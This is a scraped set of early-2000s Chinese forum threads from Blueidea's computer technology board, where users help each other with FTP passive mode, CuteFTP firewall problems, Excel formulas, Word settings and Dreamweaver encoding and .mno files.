我错了，以前我是死不承认，现在需要常常认错。
认错后，再听那掠过林梢的歌唱。

Blueidea Web Team
Team Leader

不知道

终级用户
积分：682
发帖：201
来自：
注册：2001-08-17
 发表于 2002-03-13 23:50:25 按此观看不知道的个人资料 按此发邮件给不知道 发送悄悄话给不知道 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看不知道的IP
谢谢蓝色！
朋友给我转来一个贴。希望对关心PASV问题的人有帮助。

以前在黑白有人贴过的解释：

> entry from faq
> 2. Have your FTP clients use passive mode. Passive mode data connections
> originate from the client,and thus do not experience this "port 20" problem.

There are many types of firewalls and some of them
do their work by disallowing connections from IP addresses outside their
network. FTP protocol has been designed a long time ago and it did not count
with this kind of restriction. That is why server, not client, originates
connection during FTP session. Simply, I can explain it like this: client
tells server "I am waiting on my port XXXX for your data", and server
connects (opens/originates connection) to the port specified by client and
sends the data there. That means that if the client is behind firewall which
does not allow connections from outside IP addresses, it also does not allow
connection attempt from this FTP server. So, after a few years it became
clear it is necessary to modify FTP protocol so that it is able to work also
with client which it can't connect to. And at that time PASV command was
added. It works very simple: Client sends PASV command to server which
answers something like this "The data is waiting for you on my port YYYY"
and now client only connects to the specified port on the server to transfer
the data. So, connection now originates client and there is no problem with
firewall.

知之为知之，不知为不知！！
上一贴 | 下一贴
快速回复 主题：关于FTP的问题
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

经典论坛 PS版与艺设版 联合举办 『设计四连击』 设计接龙


我的cuteftp怎么回事啊? - 经 典 论 坛

计算机技术
我的cuteftp怎么回事啊?

上一贴 | 下一贴
发表人 | 主题: 我的cuteftp怎么回事啊?
冷语 Fierce 现任版主 积分：14069 发帖：5375 来自：BeiJing 注册：2001-03-06 | 发表于 2002-02-18 12:08:20 按此观看冷语的个人资料 按此发邮件给冷语 冷语 的 oicq 是6577192,查看 6577192 的资料 收藏该主题供以后查看 发送悄悄话给冷语 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看冷语的IP 密码明明是对的... 提示是这样... 是不是哪里设置错了? STATUS:> Disconnect: Sunday 12:13:19 02-18-2001 STATUS:> Waiting to try again... STATUS:> Connect: Sunday 12:13:21 02-18-2001 STATUS:> Connecting to 211.155.23.65 STATUS:> Connecting to 211.155.23.65 (ip = 211.155.23.65) STATUS:> Socket connected. Waiting for welcome message... 220 Serv-U FTP Server v3.1 for WinSock ready... STATUS:> Connected. Authenticating... COMMAND:> USER yibaner.com 331 User n [ Come As You Are ] Blueidea Web Team Moderator Of Flash forum
冷语 Fierce 现任版主 积分：14069 发帖：5375 来自：BeiJing 注册：2001-03-06 | 发表于 2002-02-18 12:15:18 按此观看冷语的个人资料 按此发邮件给冷语 冷语 的 oicq 是6577192,查看 6577192 的资料 发送悄悄话给冷语 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看冷语的IP 找到原因了 是防火墙的问题... [ Come As You Are ] Blueidea Web Team Moderator Of Flash forum
上一贴 | 下一贴
快速回复 主题：我的cuteftp怎么回事啊?
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


请问有没有文件格式批量转换工具？ - 经 典 论 坛

经典论坛 PS版与艺设版 联合举办 『设计四连击』 设计接龙

计算机技术
请问有没有文件格式批量转换工具？

上一贴 | 下一贴
发表人 | 主题: 请问有没有文件格式批量转换工具？
birder 终级用户 积分：634 发帖：270 来自： 注册：2001-06-19 | 发表于 2002-01-29 14:05:36 按此观看birder的个人资料 按此发邮件给birder birder 的 oicq 是68656054,查看 68656054 的资料 收藏该主题供以后查看 发送悄悄话给birder 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看birder的IP 手头有一大堆wps office格式文件，现需要转换成纯文本格式， 如果把文件一个一个用wps office另存为.txt，简直是要人命 有没有批处理方法或是相关工具软件？ 请指教，谢谢！ 在荆棘中放歌~~
阿修罗飞天舞 无关风月 现任版主 积分：2516 发帖：2481 来自：杭州 注册：2001-05-21 | 发表于 2002-01-29 14:28:57 按此观看阿修罗飞天舞的个人资料 按此发邮件给阿修罗飞天舞 阿修罗飞天舞 的 oicq 是5194599,查看 5194599 的资料 发送悄悄话给阿修罗飞天舞 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看阿修罗飞天舞的IP “文件”→“建立新文件”命令，打开“新建”文件对话框（注意不能单击快捷栏上的“新建”图标或直接按“Ctrl+N”快捷键，这样Word会使用其默认模板建立一个新文件，而不会打开“新建”文件对话框），点击“其它文档”标签，并双击其中的“转换向导”项目（但如果你的机器中没有安装此模板，系统会自动启动Office2000或XP的安装程序，并会提示你插入Office2000光盘），再顺着向导一步一步操作。利用该向导既可以将Word2000/XP中所有支持的文件格式批量转换成Word2000/XP格式，也可以将Word2000/XP格式批量转换至Word2000/XP中所有支持的文件格式，包括RTF文件、WEB页文件、WPS文件、Lotus 1-2-3、Microsoft工作表、Outlook工作薄等 坐看秋草只须臾 秋夕惊鸿往日情 不忍萧瑟枯原景 思思念念无日月 随风散去荻上露 薄暮伤别彷若梦 秋日难留故人心 今年今生今日尽 Blueidea Web Team
birder 终级用户 积分：634 发帖：270 来自： 注册：2001-06-19 | 发表于 2002-01-29 16:40:21 按此观看birder的个人资料 按此发邮件给birder birder 的 oicq 是68656054,查看 68656054 的资料 发送悄悄话给birder 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看birder的IP 感谢感谢，可帮了大忙了 没想到office还有这等宝贝 在荆棘中放歌~~
stiff 初级用户 积分：119 发帖：30 来自： 注册：2001-08-31 | 发表于 2002-01-29 21:15:02 按此观看stiff的个人资料 按此发邮件给stiff stiff 的 oicq 是1628947,查看 1628947 的资料 发送悄悄话给stiff 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看stiff的IP OFFICE97没有这个选项。
birder 终级用户 积分：634 发帖：270 来自： 注册：2001-06-19 | 发表于 2002-01-30 11:00:05 按此观看birder的个人资料 按此发邮件给birder birder 的 oicq 是68656054,查看 68656054 的资料 发送悄悄话给birder 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看birder的IP 检查一下 ，word组件可装全了，我的office 2000一开始就没装全， 后来增加组件就找到其它文档的选项卡了。 在荆棘中放歌~~
上一贴 | 下一贴
快速回复 主题：请问有没有文件格式批量转换工具？
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


请求帮助啊！！ - 经 典 论 坛

dreamweaver MX 功能探索

计算机技术
请求帮助啊！！

上一贴 | 下一贴
发表人 主题: 请求帮助啊！！
mxj211

初级用户
积分：7
发帖：2
来自：辽宁省沈阳市
注册：2002-03-05
 发表于 2002-03-05 13:42:52 按此观看mxj211的个人资料 按此发邮件给mxj211 mxj211 的 oicq 是5363167,查看 5363167 的资料 收藏该主题供以后查看 发送悄悄话给mxj211 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看mxj211的IP
各位：大家好！
小弟初到此地，请大家多多关照！！
我在使用EXCEL时有个小问题
我想在一列的每一个单元格内加上一个相同的数（原单元内有不同数值）。最后在单元格内显示相加以后的数值
不知道应该怎样去做啊？
希望大家多帮忙！！谢谢！！
我的电子邮箱：mxj211@sina.com
我的QICQ：5363167 我的电话：0372--5934242

多谢大家啊Text

AirTree

超级用户
积分：375
发帖：231
来自：无人地带
注册：2001-12-07
 发表于 2002-03-05 14:00:30 按此观看AirTree的个人资料 按此发邮件给AirTree AirTree 的 oicq 是894074,查看 894074 的资料 发送悄悄话给AirTree 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看AirTree的IP
我的机器现在没有EXECL，不过我想应该不难处理。

首先将原表格完全复制一份，粘贴到一个新的表格中。在你需要处理的那一列，选择第一格单元格，其数值修改为调用原表格相应单元格的数值再加上一个数，然后将此列的所有单元格按照这个格式定义。

打雷了！下雨了！大家快回家收衣服啊……
quakerman

高级用户
积分：221
发帖：199
来自：
注册：2001-07-23
 发表于 2002-03-05 14:26:55 按此观看quakerman的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给quakerman 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看quakerman的IP
第一个问题：拖拉选中所有想变成同样数字的单元格,敲那个数字,然后ctrl+enter。
第二个问题：选中所有需要求和的单元格，同时多选出一个空白单元格，单击快捷工具栏里的∑按钮。

感情就像一粒种，不管你对他掉眼泪还是撒尿，他都可能发芽……
quakerman

高级用户
积分：221
发帖：199
来自：
注册：2001-07-23
 发表于 2002-03-05 14:40:22 按此观看quakerman的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给quakerman 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看quakerman的IP
发完才发现第一个问题是要都加一个数而不是变成同一个数，那就应该这样：（假设c列为源数，c1为第一个数据单元格，要加5，e列为空白列）在与c列第一个数据单元格平行的e列单元格内写=c1+5，然后双击拖动柄，然后将结果选择性粘贴---数值会数据源列。

感情就像一粒种，不管你对他掉眼泪还是撒尿，他都可能发芽……
mxj211

初级用户
积分：7
发帖：2
来自：辽宁省沈阳市
注册：2002-03-05
 发表于 2002-03-05 17:23:00 按此观看mxj211的个人资料 按此发邮件给mxj211 mxj211 的 oicq 是5363167,查看 5363167 的资料 发送悄悄话给mxj211 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看mxj211的IP
quakerman在上个帖子中说
引用:
发完才发现第一个问题是要都加一个数而不是变成同一个数，那就应该这样：（假设c列为源数，c1为第一个数据单元格，要加5，e列为空白列）在与c列第一个数据单元格平行的e列单元格内写=c1+5，然后双击拖动柄，然后将结果选择性粘贴---数值会数据源列。

谢谢您的帮助，关心，我已经完成了这个工作。

十分感谢，有机会我们再联系！！

上一贴 | 下一贴
快速回复 主题：请求帮助啊！！
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

经典论坛 PS版与艺设版 联合举办 『设计四连击』 设计接龙


word文档关闭会自动保存怎么办？ - 经 典 论 坛

经典论坛 PS版与艺设版 联合举办 『设计四连击』 设计接龙

计算机技术
word文档关闭会自动保存怎么办？

上一贴 | 下一贴
发表人 | 主题: word文档关闭会自动保存怎么办？
sgilb 高级用户 积分：187 发帖：76 来自： 注册：2001-09-16 | 发表于 2001-12-18 20:56:34 按此观看sgilb的个人资料 该用户不允许显示它的电子邮件 收藏该主题供以后查看 发送悄悄话给sgilb 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看sgilb的IP help
赵鹏 初级用户 积分：9 发帖：1196 来自：福建福州 注册：2001-04-02 | 发表于 2001-12-19 02:48:30 按此观看赵鹏的个人资料 按此发邮件给赵鹏 赵鹏 的 oicq 是7070770,查看 7070770 的资料 发送悄悄话给赵鹏 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看赵鹏的IP 菜单 工具>选项>保存 去年元夜时 花市灯如昼 月上柳梢头 人约黄昏后 今年元夜时 月与灯依旧 不见去年人 泪湿青衫袖
上一贴 | 下一贴
快速回复 主题：word文档关闭会自动保存怎么办？
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

dreamweaver MX 功能探索


用WORD怎么实现多页显示。 - 经 典 论 坛

计算机技术
用WORD怎么实现多页显示。

上一贴 | 下一贴
发表人 | 主题: 用WORD怎么实现多页显示。
UH 终级用户 积分：597 发帖：188 来自：LIAONING 注册：2000-12-25 | 发表于 2001-12-25 16:48:48 按此观看UH的个人资料 按此发邮件给UH UH 的 oicq 是19732312,查看 19732312 的资料 收藏该主题供以后查看 发送悄悄话给UH 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看UH的IP 可能非常简单。就是像看电子书是一页接着一页 随意,随意 呵呵
樱 终级用户 积分：1308 发帖：401 来自：▓★☆★☆★▓ 注册：2000-12-11 | 发表于 2001-12-25 17:19:55 按此观看樱的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给樱 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看樱的IP 什么一页接着一页？ 18J [w]
大哥 超级用户 积分：322 发帖：112 来自： 注册：2001-12-20 | 发表于 2001-12-26 11:30:05 按此观看大哥的个人资料 该用户不允许显示它的电子邮件 访问大哥的主页 发送悄悄话给大哥 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看大哥的IP 设置成普通视图，然后直接按PgUP、PgDn不就得了？ 要想真搞成正好一个页面，可能字体会缩得看不清楚了。 老哥我知道的就这么多了。
上一贴 | 下一贴
快速回复 主题：用WORD怎么实现多页显示。
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

dreamweaver MX 功能探索


一个word的问题？？？？ - 经 典 论 坛

经典论坛 PS版与艺设版 联合举办 『设计四连击』 设计接龙

计算机技术
一个word的问题？？？？

上一贴 | 下一贴
发表人 | 主题: 一个word的问题？？？？
宇宙星云 终级用户 积分：474 发帖：305 来自：广州 注册：2000-12-13 | 发表于 2001-12-31 01:57:33 按此观看宇宙星云的个人资料 按此发邮件给宇宙星云 宇宙星云 的 oicq 是365435,查看 365435 的资料 收藏该主题供以后查看 发送悄悄话给宇宙星云 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看宇宙星云的IP 本人是一word菜鸟，编辑文档时候，对齐右边对我来说颇为头疼，无论怎么调节，总是有一个或半个字符没能对齐。哪位大虾指点一下。 ┏━━┓∴· oooO Oooo°∴┏━━┓ ┃拒绝┃°ぎ ( ㊣) ( ㊣)ぎ·┃珍惜┃ ┃網戀┃∴☆ \ ( ) / ☆∴┃生命┃ ┗━━┛★．° \_) (_/·．★┗━━┛
yunbin 经典强盗 现任版主 积分：2397 发帖：1033 来自：火星 注册：2001-09-27 | 发表于 2001-12-31 13:48:21 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP 微调强行对齐 按住alt再移动文档上班的缩进标签~ A man can succeed at almost anything for which he has unlimited enthusiasm. Blueidea Web Team Moderator Of Computer Technology Forum
上一贴 | 下一贴
快速回复 主题：一个word的问题？？？？
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


DW4为何粘贴中文会变成问号？ - 经 典 论 坛

计算机技术
DW4为何粘贴中文会变成问号？

上一贴 | 下一贴
发表人 | 主题: DW4为何粘贴中文会变成问号？
阿P @1981 积分：1338 发帖：561 来自：@1981.COM 注册：2000-11-03 | 发表于 2001-12-19 19:06:13 按此观看阿P的个人资料 按此发邮件给阿P 访问阿P的主页 阿P 的 oicq 是223607,查看 223607 的资料 收藏该主题供以后查看 发送悄悄话给阿P 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看阿P的IP 请问我用 DW4 粘贴TXT 文档里的汉字的时候会变成问好。 而英文和数字可以？ 为什么？如果解决呢 ？ 急啊 麻烦大家了/ www.@1981.com
myhyli 现任版主 积分：21917 发帖：5185 来自： 注册：2000-07-22 | 发表于 2001-12-19 19:19:51 按此观看myhyli的个人资料 按此发邮件给myhyli 发送悄悄话给myhyli 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看myhyli的IP 页面编码是否设置成了英文？或者big5等？ Myhyli · http://www.blueidea.com/user/myhyli · http://dynamic.macromedia.com/bin/MM/exchange/search_result.jsp?SearchType=ADVANCE&extAuthor=myhyli@blueidea.com Blueidea Web Team Moderator Of Dreamweaver & Javascript
阿P @1981 积分：1338 发帖：561 来自：@1981.COM 注册：2000-11-03 | 发表于 2001-12-19 19:51:46 按此观看阿P的个人资料 按此发邮件给阿P 访问阿P的主页 阿P 的 oicq 是223607,查看 223607 的资料 发送悄悄话给阿P 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看阿P的IP GB2312啊 您是说这吗？ 我现在选的就是 GB2312 www.@1981.com
天外飞猪 经典飞猪 积分：2196 发帖：909 来自：AnHui 注册：2001-11-16 | 发表于 2001-12-19 20:08:49 按此观看天外飞猪的个人资料 按此发邮件给天外飞猪 访问天外飞猪的主页 天外飞猪 的 oicq 是131433,查看 131433 的资料 发送悄悄话给天外飞猪 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看天外飞猪的IP 说不定你粘贴了系统没有的字体
poorfish 经典圣僧 现任版主 积分：11474 发帖：3691 来自：江西萍乡 注册：2000-12-04 | 发表于 2001-12-19 21:16:54 按此观看poorfish的个人资料 按此发邮件给poorfish 访问poorfish的主页 poorfish 的 oicq 是1525464,查看 1525464 的资料 发送悄悄话给poorfish 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看poorfish的IP 我也有这种问题，不仅仅是在DW中，其它软件也会出现 系统是XP加中文语言包 转到计算机技术版问问 【DW版常见问题解答】【破废墟】 Blueidea Web Team Moderator of DW & JS Forum
嘿嘿 坏笑 积分：414 发帖：559 来自： 注册：2001-10-06 | 发表于 2001-12-20 10:23:44 按此观看嘿嘿的个人资料 按此发邮件给嘿嘿 嘿嘿 的 oicq 是42323447,查看 42323447 的资料 发送悄悄话给嘿嘿 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看嘿嘿的IP 好象在早期的win2000版本出现过这种情况，但后来就没再见过了。 缘是天定,份在人为.
donger SmallOgre 积分：6207 发帖：3675 来自： 注册：2000-07-22 | 发表于 2001-12-20 10:30:44 按此观看donger的个人资料 按此发邮件给donger 访问donger的主页 发送悄悄话给donger 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看donger的IP 我将DW中的代码拷贝到记事本中，中文都是乱码，怎么解决呀 Enough is as good as a feast. Blueidea Web Team
blueonline Blueonline 积分：829 发帖：1744 来自：blue-online. 注册：2000-12-09 | 发表于 2001-12-20 17:01:34 按此观看blueonline的个人资料 按此发邮件给blueonline 访问blueonline的主页 blueonline 的 oicq 是2048486,查看 2048486 的资料 发送悄悄话给blueonline 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看blueonline的IP c&p的时候把中文输入发打开 流自己的汗，吃自己的饭，靠天、靠地不如自己干。 :::::::bLUE-oNlINE.nET || vERSION 2001 ───────
月闪闪 终级用户 积分：2281 发帖：1479 来自：香格里拉 注册：2000-09-25 | 发表于 2001-12-20 20:58:05 按此观看月闪闪的个人资料 按此发邮件给月闪闪 访问月闪闪的主页 月闪闪 的 oicq 是2855760,查看 2855760 的资料 发送悄悄话给月闪闪 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看月闪闪的IP 我这也经常出现乱码，有时候是在纯文本中粘贴，也支出现乱码。真的是很奇怪。 要跳要舞，羊男说
阿P @1981 积分：1338 发帖：561 来自：@1981.COM 注册：2000-11-03 | 发表于 2001-12-20 21:15:45 按此观看阿P的个人资料 按此发邮件给阿P 访问阿P的主页 阿P 的 oicq 是223607,查看 223607 的资料 发送悄悄话给阿P 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看阿P的IP 我用的就是 比较早版本的WIN2000 我用其他工具 打开文档 然后可以了。 很怪。 www.@1981.com
wx@ay 看不懂 积分：7424 发帖：5353 来自：ay.ha.cn 注册：1999-12-23 | 发表于 2001-12-20 22:33:58 wx@ay 的 oicq 是1850777,查看 1850777 的资料 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 这个问题不仅仅是粘贴时存在，即使是在文档编辑时，输入中文有时也会发生。 可以肯定你的文档全部是双字节的， 而在DW中，默认是有一个单字节的空格的。 所以，粘贴后在CODE状态下删除你所粘贴的文档前的所有空白， 一般问题就可以解决了。需要段前空格的话，再回到编辑状态用中文双字节输入即可。 （一定要用双字节输入，就是智能ABC下SHIFT+SPACE） 不过我建议最好在CODE状态下粘贴外来文档。 至于COPY DW中的代码到NOTEPAD中出现乱码，同样也是这个原因。 不过这个完全可以不去COPY ， 到浏览器中预览，然后查看原文件就行了。 Think like a Genius. 有些爱情象指甲，有些象牙齿。 指甲能不断生长，不要的就剪掉。 而牙齿就不同。 象牙齿的爱情会不同，它会永远！ 小心蛀牙！！！
Bobofu 终级用户 积分：475 发帖：425 来自：北京 注册：2000-09-01 | 发表于 2001-12-21 11:23:31 按此观看Bobofu的个人资料 按此发邮件给Bobofu Bobofu 的 oicq 是6376850,查看 6376850 的资料 发送悄悄话给Bobofu 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Bobofu的IP 我也遇到过这个问题 解决办法：先拷贝到office2K的word里，然后粘出来，就没有乱码了 原因：不知 人生，充满取舍......
上一贴 | 下一贴
快速回复 主题：DW4为何粘贴中文会变成问号？
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


*.mno是什么文件？？ - 经 典 论 坛

dreamweaver MX 功能探索

计算机技术
*.mno是什么文件？？

该主题已被锁定，不再接受回复
上一贴 | 下一贴
发表人 主题: *.mno是什么文件？？
alone4ph

初级用户
积分：43
发帖：12
来自：
注册：2001-12-28
 发表于 2002-02-14 21:49:42 按此观看alone4ph的个人资料 按此发邮件给alone4ph 访问alone4ph的主页 alone4ph 的 oicq 是36528292,查看 36528292 的资料 收藏该主题供以后查看 发送悄悄话给alone4ph 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看alone4ph的IP
*.mno是什么文件？？
ImHow

怎样
积分：2446
发帖：648
来自：::HowHome::
注册：2002-01-16
 发表于 2002-02-16 21:22:33 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP
http://www.blueidea.com/bbs/newsdetail.asp?id=374615

::古落根门::

唯有不断学习 才能不断进步

xqlyg

超级用户
积分：362
发帖：92
来自：china
注册：2002-02-07
 发表于 2002-02-16 22:15:06 按此观看xqlyg的个人资料 按此发邮件给xqlyg xqlyg 的 oicq 是41770172,查看 41770172 的资料 发送悄悄话给xqlyg 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看xqlyg的IP
ImHow
你的那个软件也查不出 *.mno是什么文件？

ImHow

怎样
积分：2446
发帖：648
来自：::HowHome::
注册：2002-01-16
 发表于 2002-02-17 02:37:24 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP
我也没有试过那个软件，贴在这里让他看看啊，也不知那个文件他哪搞来的，很奇怪，不会又是什么光盘镜像文件吧

::古落根门::

唯有不断学习 才能不断进步

wx@ay

看不懂
积分：7424
发帖：5353
来自：ay.ha.cn
注册：1999-12-23
 发表于 2002-02-17 19:11:53 wx@ay 的 oicq 是1850777,查看 1850777 的资料 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent
.mno应该是DW生成的附属文件
当你在使用DW时，如果自己定义了SITE窗口，写入了一些设计说明的话，
那么这些说明就存放在_notes文件夹的*.mno文件中。

Think like a Genius.

有些爱情象指甲，有些象牙齿。
指甲能不断生长，不要的就剪掉。
而牙齿就不同。
象牙齿的爱情会不同，它会永远！
小心蛀牙！！！

onlysnake

终级用户
积分：2127
发帖：739
来自：经典_流氓屯
注册：2002-01-10
 发表于 2002-02-17 21:59:25 按此观看onlysnake的个人资料 按此发邮件给onlysnake onlysnake 的 oicq 是24394523,查看 24394523 的资料 发送悄悄话给onlysnake 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看onlysnake的IP
那如果我作的作品多了，这个文件夹会很大的吧！

我在天空写下你的名字，但是被风带走了；我在沙滩写下你的名字，但是被浪花带走了；于是，我在大街上的每个角落写下你的名字，…………·#！￥%—*+但是，我被警察带走了！！

Blueidea Counter Strike Team
=Blueidea=onlysnake

ImHow

怎样
积分：2446
发帖：648
来自：::HowHome::
注册：2002-01-16
 发表于 2002-02-17 22:21:39 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP
wx@ay在上个帖子中说
引用:
.mno应该是DW生成的附属文件
当你在使用DW时，如果自己定义了SITE窗口，写入了一些设计说明的话，
那么这些说明就存放在_notes文件夹的*.mno文件中。

有没有什么办法可以避免_notes文件夹的生成?

::古落根门::

唯有不断学习 才能不断进步

wx@ay

看不懂
积分：7424
发帖：5353
来自：ay.ha.cn
注册：1999-12-23
 发表于 2002-02-18 01:50:03 wx@ay 的 oicq 是1850777,查看 1850777 的资料 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent
一般情况下，这个文件夹不会很大，存储的文件也都是文本的
而且，使用DW的网站管理后，_notes文件夹当中存放了对站
点的特殊定义及文件的某些相关信息，如果删除了，会丢失这
些信息，从而带来某些不必要的损失。
特别是多人合作管理站点的情况下。

Think like a Genius.

有些爱情象指甲，有些象牙齿。
指甲能不断生长，不要的就剪掉。
而牙齿就不同。
象牙齿的爱情会不同，它会永远！
小心蛀牙！！！

啸

无意
现任版主
积分：6225
发帖：2154
来自：
注册：2000-08-01
 发表于 2002-02-18 09:50:37 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP
不过上传的时候挺烦这些文件的，特别是在图片目录里的，差不多每个图片都有一个对应的mno文件，虽然不大，但多了也很影响上传的速度，不知道有没有一次就可以全部删除站点里所有mno文件的办法，用dw.

宠辱不惊，坐看庭前花开花落；去留无意，任天上云卷云舒......

Blueidea Web Team.
Moderator Of Computer Technology Forum

onlysnake

终级用户
积分：2127
发帖：739
来自：经典_流氓屯
注册：2002-01-10
 发表于 2002-02-18 10:11:44 按此观看onlysnake的个人资料 按此发邮件给onlysnake onlysnake 的 oicq 是24394523,查看 24394523 的资料 发送悄悄话给onlysnake 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看onlysnake的IP
是呀，
如果没有太多用途的话删了也不会有太大的影响的吧！

我在天空写下你的名字，但是被风带走了；我在沙滩写下你的名字，但是被浪花带走了；于是，我在大街上的每个角落写下你的名字，…………·#！￥%—*+但是，我被警察带走了！！

Blueidea Counter Strike Team
=Blueidea=onlysnake

wx@ay

看不懂
积分：7424
发帖：5353
来自：ay.ha.cn
注册：1999-12-23
